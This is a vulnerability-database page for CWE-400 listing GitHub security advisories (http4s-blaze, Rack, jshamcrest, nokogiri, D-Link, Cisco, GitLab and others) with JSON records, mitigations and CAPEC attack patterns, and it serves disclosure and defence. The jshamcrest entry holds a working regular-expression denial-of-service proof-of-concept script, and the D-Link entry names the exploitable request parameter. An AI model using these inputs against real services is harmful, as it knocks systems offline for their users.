CWE-400
DiscouragedUncontrolled Resource Consumption
Abstraction: Class · Status: Draft
The product does not properly control the allocation and maintenance of a limited resource.
5401 vulnerabilities reference this CWE, most recent first.
GHSA-XHV5-W9C5-2R2W
Vulnerability from github – Published: 2021-02-02 21:42 – Updated: 2022-10-25 20:51Impact
blaze-core, a library underlying http4s-blaze-server, accepts connections unboundedly on its selector pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections.
http4s provides a general MaxActiveRequests middleware mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open.
Patches
In 0.21.18, 0.22.0-M3, and 1.0.0-M16, a newmaxConnections property, with a default value of 1024, has been added to the BlazeServerBuilder. Setting the value to a negative number restores unbounded behavior, but is strongly disrecommended.
The NIO2 backend does not respect maxConnections. Its use is now deprecated in http4s-0.21, and the option is removed altogether starting in http4s-0.22.
The connections are bounded in 0.21.17, 0.22.0-M2, and 1.0.0-M14, but the maxConnections parameter was passed incorrectly, making it impossible to change the Blaze default of 512.
Workarounds
- An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx’s connection bounding is both asynchronous and properly respects backpressure.
- http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support. Its performance in terms of RPS is appreciably behind Blaze’s, and as the newest backend, has substantially less industrial uptake.
- http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.
- http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake.
References
See the Blaze GHSA for more on the underlying issue.
For more information
If you have any questions or comments about this advisory: * Open an issue in http4s/http4s * Contact us according to the http4s security policy
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.http4s:http4s-blaze-server_2.12"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.21.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.http4s:http4s-blaze-server_2.13"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.21.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-21294"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2021-02-02T21:42:25Z",
"nvd_published_at": "2021-02-02T22:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\nblaze-core, a library underlying http4s-blaze-server, accepts connections unboundedly on its selector pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections.\n\nhttp4s provides a general `MaxActiveRequests` middleware mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open.\n\n### Patches\n\nIn 0.21.18, 0.22.0-M3, and 1.0.0-M16, a new`maxConnections` property, with a default value of 1024, has been added to the `BlazeServerBuilder`. Setting the value to a negative number restores unbounded behavior, but is strongly disrecommended. \n\nThe NIO2 backend does not respect `maxConnections`. Its use is now deprecated in http4s-0.21, and the option is removed altogether starting in http4s-0.22.\n\nThe connections are bounded in 0.21.17, 0.22.0-M2, and 1.0.0-M14, but the `maxConnections` parameter was passed incorrectly, making it impossible to change the Blaze default of 512. \n\n### Workarounds\n* An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx\u2019s connection bounding is both asynchronous and properly respects backpressure.\n* http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support. Its performance in terms of RPS is appreciably behind Blaze\u2019s, and as the newest backend, has substantially less industrial uptake.\n* http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support. Its performance in terms of requests per second is somewhat behind Blaze\u2019s, and despite Jetty\u0027s industrial adoption, the http4s integration has substantially less industrial uptake.\n* http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support. Its performance in terms of requests per second is somewhat behind Blaze\u2019s, and despite Jetty\u0027s industrial adoption, the http4s integration has substantially less industrial uptake.\n\n### References\n\nSee [the Blaze GHSA](https://github.com/http4s/blaze/security/advisories/GHSA-xmw9-q7x9-j5qc) for more on the underlying issue.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [http4s/http4s](http://github.com/http4s/http4s)\n* Contact us according to the [http4s security policy](https://github.com/http4s/http4s/security/policy)",
"id": "GHSA-xhv5-w9c5-2r2w",
"modified": "2022-10-25T20:51:11Z",
"published": "2021-02-02T21:42:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/http4s/blaze/security/advisories/GHSA-xmw9-q7x9-j5qc"
},
{
"type": "WEB",
"url": "https://github.com/http4s/http4s/security/advisories/GHSA-xhv5-w9c5-2r2w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21294"
},
{
"type": "WEB",
"url": "https://github.com/http4s/http4s/commit/987d6589ef79545b9bb2324ac4bdebf82d9a0171"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Unbounded connection acceptance in http4s-blaze-server"
}
GHSA-XJ5R-2VXF-3CH7
Vulnerability from github – Published: 2023-04-16 03:30 – Updated: 2024-04-04 03:29On D-Link DIR-819 Firmware Version 1.06 Hardware Version A1 devices, it is possible to trigger a Denial of Service via the sys_token parameter in a cgi-bin/webproc?getpage=html/index.html request.
{
"affected": [],
"aliases": [
"CVE-2022-40946"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-16T02:15:00Z",
"severity": "HIGH"
},
"details": "On D-Link DIR-819 Firmware Version 1.06 Hardware Version A1 devices, it is possible to trigger a Denial of Service via the sys_token parameter in a cgi-bin/webproc?getpage=html/index.html request.",
"id": "GHSA-xj5r-2vxf-3ch7",
"modified": "2024-04-04T03:29:53Z",
"published": "2023-04-16T03:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40946"
},
{
"type": "WEB",
"url": "https://github.com/whokilleddb/dlink-dir-819-dos"
},
{
"type": "WEB",
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/171484/D-Link-DIR-819-A1-Denial-Of-Service.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XJ5V-6V4G-JFW6
Vulnerability from github – Published: 2024-02-28 22:57 – Updated: 2024-02-29 02:30Possible DoS Vulnerability with Range Header in Rack
There is a possible DoS vulnerability relating to the Range request header in Rack. This vulnerability has been assigned the CVE identifier CVE-2024-26141.
Versions Affected: >= 1.3.0. Not affected: < 1.3.0 Fixed Versions: 3.0.9.1, 2.2.8.1
Impact
Carefully crafted Range headers can cause a server to respond with an unexpectedly large response. Responding with such large responses could lead to a denial of service issue.
Vulnerable applications will use the Rack::File middleware or the
Rack::Utils.byte_ranges methods (this includes Rails applications).
Releases
The fixed releases are available at the normal locations.
Workarounds
There are no feasible workarounds for this issue.
Patches
To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.
- 3-0-range.patch - Patch for 3.0 series
- 2-2-range.patch - Patch for 2.2 series
Credits
Thank you ooooooo_q for the report and patch
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.0.9.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "1.3.0"
},
{
"fixed": "2.2.8.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-26141"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-28T22:57:12Z",
"nvd_published_at": "2024-02-29T00:15:51Z",
"severity": "LOW"
},
"details": "# Possible DoS Vulnerability with Range Header in Rack\n\nThere is a possible DoS vulnerability relating to the Range request header in\nRack. This vulnerability has been assigned the CVE identifier CVE-2024-26141.\n\nVersions Affected: \u003e= 1.3.0.\nNot affected: \u003c 1.3.0\nFixed Versions: 3.0.9.1, 2.2.8.1\n\nImpact\n------\nCarefully crafted Range headers can cause a server to respond with an\nunexpectedly large response. Responding with such large responses could lead\nto a denial of service issue.\n\nVulnerable applications will use the `Rack::File` middleware or the\n`Rack::Utils.byte_ranges` methods (this includes Rails applications).\n\nReleases\n--------\nThe fixed releases are available at the normal locations.\n\nWorkarounds\n-----------\nThere are no feasible workarounds for this issue.\n\nPatches\n-------\nTo aid users who aren\u0027t able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 3-0-range.patch - Patch for 3.0 series\n* 2-2-range.patch - Patch for 2.2 series\n\nCredits\n-------\n\nThank you [ooooooo_q](https://hackerone.com/ooooooo_q) for the report and\npatch",
"id": "GHSA-xj5v-6v4g-jfw6",
"modified": "2024-02-29T02:30:42Z",
"published": "2024-02-28T22:57:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rack/rack/security/advisories/GHSA-xj5v-6v4g-jfw6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26141"
},
{
"type": "WEB",
"url": "https://github.com/rack/rack/commit/4849132bef471adb21131980df745f4bb84de2d9"
},
{
"type": "WEB",
"url": "https://github.com/rack/rack/commit/62457686b26d33a15a254c7768c2076e8e02b48b"
},
{
"type": "WEB",
"url": "https://discuss.rubyonrails.org/t/possible-dos-vulnerability-with-range-header-in-rack/84944"
},
{
"type": "PACKAGE",
"url": "https://github.com/rack/rack"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26141.yml"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Rack has possible DoS Vulnerability with Range Header"
}
GHSA-XJ62-87PG-VCV3
Vulnerability from github – Published: 2019-02-18 23:38 – Updated: 2023-09-13 22:47The jshamcrest package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.
Proof of concept
var js = require('jshamcrest')
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=1;i<=10000000;i=i+1) {
console.log("COUNT: " + i);
var str = '66666666666666666666666666666@ffffffffffffffffffffffffffffffff.' + genstr(i, 'a') + '{'
console.log("LENGTH: " + str.length);
var start = process.hrtime();
emailAddress.matches(str)
var end = process.hrtime(start);
console.log(end);
}
Results
It takes about 116 characters to get a 1.6 second event loop block.
[ 1, 633084590 ]
COUNT: 51
LENGTH: 116
Timeline
- October 25, 2015 - Vulnerability Identified
- October 25, 2015 - Maintainers notified (no response)
Recommendation
The jshamcrest package currently has no patched versions available.
At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are multiple modules fitting this criteria available on npm..
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "jshamcrest"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-10521"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T22:03:34Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The `jshamcrest` package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.\n\n\n## Proof of concept\n\n```js\nvar js = require(\u0027jshamcrest\u0027)\nvar emailAddress = new js.JsHamcrest.Matchers.emailAddress();\n\n\nvar genstr = function (len, chr) {\n var result = \"\";\n for (i=0; i\u003c=len; i++) {\n result = result + chr;\n }\n\n return result;\n}\n\n\nfor (i=1;i\u003c=10000000;i=i+1) {\n console.log(\"COUNT: \" + i);\n var str = \u002766666666666666666666666666666@ffffffffffffffffffffffffffffffff.\u0027 + genstr(i, \u0027a\u0027) + \u0027{\u0027\n console.log(\"LENGTH: \" + str.length);\n var start = process.hrtime();\n emailAddress.matches(str)\n\n var end = process.hrtime(start);\n console.log(end);\n}\n```\n\n### Results\nIt takes about 116 characters to get a 1.6 second event loop block.\n```\n[ 1, 633084590 ]\nCOUNT: 51\nLENGTH: 116\n```\n\n# Timeline\n- October 25, 2015 - Vulnerability Identified\n- October 25, 2015 - Maintainers notified (no response)\n\n\n## Recommendation\n\nThe `jshamcrest` package currently has no patched versions available.\n\nAt this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.](https://www.npmjs.com/search?q=validator).",
"id": "GHSA-xj62-87pg-vcv3",
"modified": "2023-09-13T22:47:33Z",
"published": "2019-02-18T23:38:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10521"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-xj62-87pg-vcv3"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/53"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Regular Expression Denial of Service in jshamcrest"
}
GHSA-XJ7M-J8GX-JWQ9
Vulnerability from github – Published: 2022-05-24 19:15 – Updated: 2023-06-30 18:31A vulnerability in the Rate Limiting Network Address Translation (NAT) feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause high CPU utilization in the Cisco QuantumFlow Processor of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to mishandling of the rate limiting feature within the QuantumFlow Processor. An attacker could exploit this vulnerability by sending large amounts of traffic that would be subject to NAT and rate limiting through an affected device. A successful exploit could allow the attacker to cause the QuantumFlow Processor utilization to reach 100 percent on the affected device, resulting in a DoS condition.
{
"affected": [],
"aliases": [
"CVE-2021-1624"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-23T03:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in the Rate Limiting Network Address Translation (NAT) feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause high CPU utilization in the Cisco QuantumFlow Processor of an affected device, resulting in a denial of service (DoS) condition. This vulnerability is due to mishandling of the rate limiting feature within the QuantumFlow Processor. An attacker could exploit this vulnerability by sending large amounts of traffic that would be subject to NAT and rate limiting through an affected device. A successful exploit could allow the attacker to cause the QuantumFlow Processor utilization to reach 100 percent on the affected device, resulting in a DoS condition.",
"id": "GHSA-xj7m-j8gx-jwq9",
"modified": "2023-06-30T18:31:00Z",
"published": "2022-05-24T19:15:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1624"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ratenat-pYVLA7wM"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XJQG-9JVG-FGX2
Vulnerability from github – Published: 2018-08-21 19:03 – Updated: 2023-03-13 23:53The xmlStringLenDecodeEntities function in parser.c in libxml2 before 2.9.3 (as used in nokogiri before 1.6.7.1) does not properly prevent entity expansion, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted XML data, a different vulnerability than CVE-2014-3660.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.6.7.0"
},
"package": {
"ecosystem": "RubyGems",
"name": "nokogiri"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0"
},
{
"fixed": "1.6.7.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2015-5312"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T22:03:39Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The xmlStringLenDecodeEntities function in parser.c in libxml2 before 2.9.3 (as used in nokogiri before 1.6.7.1) does not properly prevent entity expansion, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted XML data, a different vulnerability than CVE-2014-3660.",
"id": "GHSA-xjqg-9jvg-fgx2",
"modified": "2023-03-13T23:53:36Z",
"published": "2018-08-21T19:03:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5312"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1276693"
},
{
"type": "WEB",
"url": "https://git.gnome.org/browse/libxml2/commit/?id=69030714cde66d525a8884bda01b9e8f0abf8e1e"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/nokogiri/CVE-2015-5312.yml"
},
{
"type": "WEB",
"url": "https://groups.google.com/forum/#!topic/ruby-security-ann/aSbgDiwb24s"
},
{
"type": "WEB",
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04944172"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201701-37"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206166"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206167"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206168"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206169"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00000.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00120.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-updates/2016-01/msg00031.html"
},
{
"type": "WEB",
"url": "http://marc.info/?l=bugtraq\u0026m=145382616617563\u0026w=2"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2015-2549.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2015-2550.html"
},
{
"type": "WEB",
"url": "http://www.debian.org/security/2015/dsa-3430"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
},
{
"type": "WEB",
"url": "http://www.ubuntu.com/usn/USN-2834-1"
},
{
"type": "WEB",
"url": "http://xmlsoft.org/news.html"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Nokogiri subject to DoS via libxml2 vulnerability"
}
GHSA-XJRJ-6839-JG74
Vulnerability from github – Published: 2022-05-24 17:45 – Updated: 2022-06-05 00:00In intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c in the Linux kernel through 5.11.8 on some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a PEBS record is mishandled, aka CID-d88d05a9e0b6.
{
"affected": [],
"aliases": [
"CVE-2021-28971"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-03-22T17:15:00Z",
"severity": "MODERATE"
},
"details": "In intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c in the Linux kernel through 5.11.8 on some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a PEBS record is mishandled, aka CID-d88d05a9e0b6.",
"id": "GHSA-xjrj-6839-jg74",
"modified": "2022-06-05T00:00:21Z",
"published": "2022-05-24T17:45:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28971"
},
{
"type": "WEB",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d88d05a9e0b6d9356e97129d4ff9942d765f46ea"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4VCKIOXCOZGXBEZMO5LGGV5MWCHO6FT3"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PTRNPQTZ4GVS46SZ4OBXY5YDOGVPSTGQ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T2S3I4SLRNRUQDOFYUS6IUAZMQNMPNLG"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20210430-0003"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XJRM-79VQ-7XRV
Vulnerability from github – Published: 2022-05-13 01:04 – Updated: 2022-05-13 01:04An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker may be able to disrupt a targeted web server, resulting in a denial of service because of UNCONTROLLED RESOURCE CONSUMPTION.
{
"affected": [],
"aliases": [
"CVE-2016-8374"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-02-13T21:59:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered in Schneider Electric Magelis HMI Magelis GTO Advanced Optimum Panels, all versions, Magelis GTU Universal Panel, all versions, Magelis STO5xx and STU Small panels, all versions, Magelis XBT GH Advanced Hand-held Panels, all versions, Magelis XBT GK Advanced Touchscreen Panels with Keyboard, all versions, Magelis XBT GT Advanced Touchscreen Panels, all versions, and Magelis XBT GTW Advanced Open Touchscreen Panels (Windows XPe). An attacker may be able to disrupt a targeted web server, resulting in a denial of service because of UNCONTROLLED RESOURCE CONSUMPTION.",
"id": "GHSA-xjrm-79vq-7xrv",
"modified": "2022-05-13T01:04:06Z",
"published": "2022-05-13T01:04:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-8374"
},
{
"type": "WEB",
"url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-308-02"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/94093"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XJW7-JPQW-3Q4X
Vulnerability from github – Published: 2023-04-05 21:30 – Updated: 2023-04-12 21:30An issue has been discovered in GitLab affecting all versions starting from 15.9 before 15.9.4, all versions starting from 15.10 before 15.10.1. A search timeout could be triggered if a specific HTML payload was used in the issue description.
{
"affected": [],
"aliases": [
"CVE-2023-1787"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-05T21:15:00Z",
"severity": "MODERATE"
},
"details": "An issue has been discovered in GitLab affecting all versions starting from 15.9 before 15.9.4, all versions starting from 15.10 before 15.10.1. A search timeout could be triggered if a specific HTML payload was used in the issue description.",
"id": "GHSA-xjw7-jpqw-3q4x",
"modified": "2023-04-12T21:30:21Z",
"published": "2023-04-05T21:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1787"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-1787.json"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/394817"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-XM28-FW2X-FQV2
Vulnerability from github – Published: 2019-05-31 23:08 – Updated: 2021-08-04 21:19All versions of foreman are vulnerable to Regular Expression Denial of Service when requests to it are made with a specially crafted path.
Recommendation
Upgrade to version 3.0.1.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "foreman"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2019-05-31T23:07:09Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "All versions of `foreman` are vulnerable to Regular Expression Denial of Service when requests to it are made with a specially crafted path.\n\n\n## Recommendation\n\nUpgrade to version 3.0.1.",
"id": "GHSA-xm28-fw2x-fqv2",
"modified": "2021-08-04T21:19:17Z",
"published": "2019-05-31T23:08:14Z",
"references": [
{
"type": "WEB",
"url": "https://hackerone.com/reports/320586"
},
{
"type": "WEB",
"url": "https://github.com/strongloop/node-foreman/blob/v2.0.0/forward.js#L30"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/npm:foreman:20180429"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/645"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Denial of Service in foreman"
}
Mitigation
Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
Mitigation
- Mitigation of resource exhaustion attacks requires that the target system either:
- The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
- The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
- recognizes the attack and denies that user further access for a given amount of time, or
- uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Ensure that protocols have specific limits of scale placed on them.
Mitigation
Ensure that all failures in resource allocation place the system into a safe posture.
CAPEC-147: XML Ping of the Death
An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
CAPEC-227: Sustained Client Engagement
An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.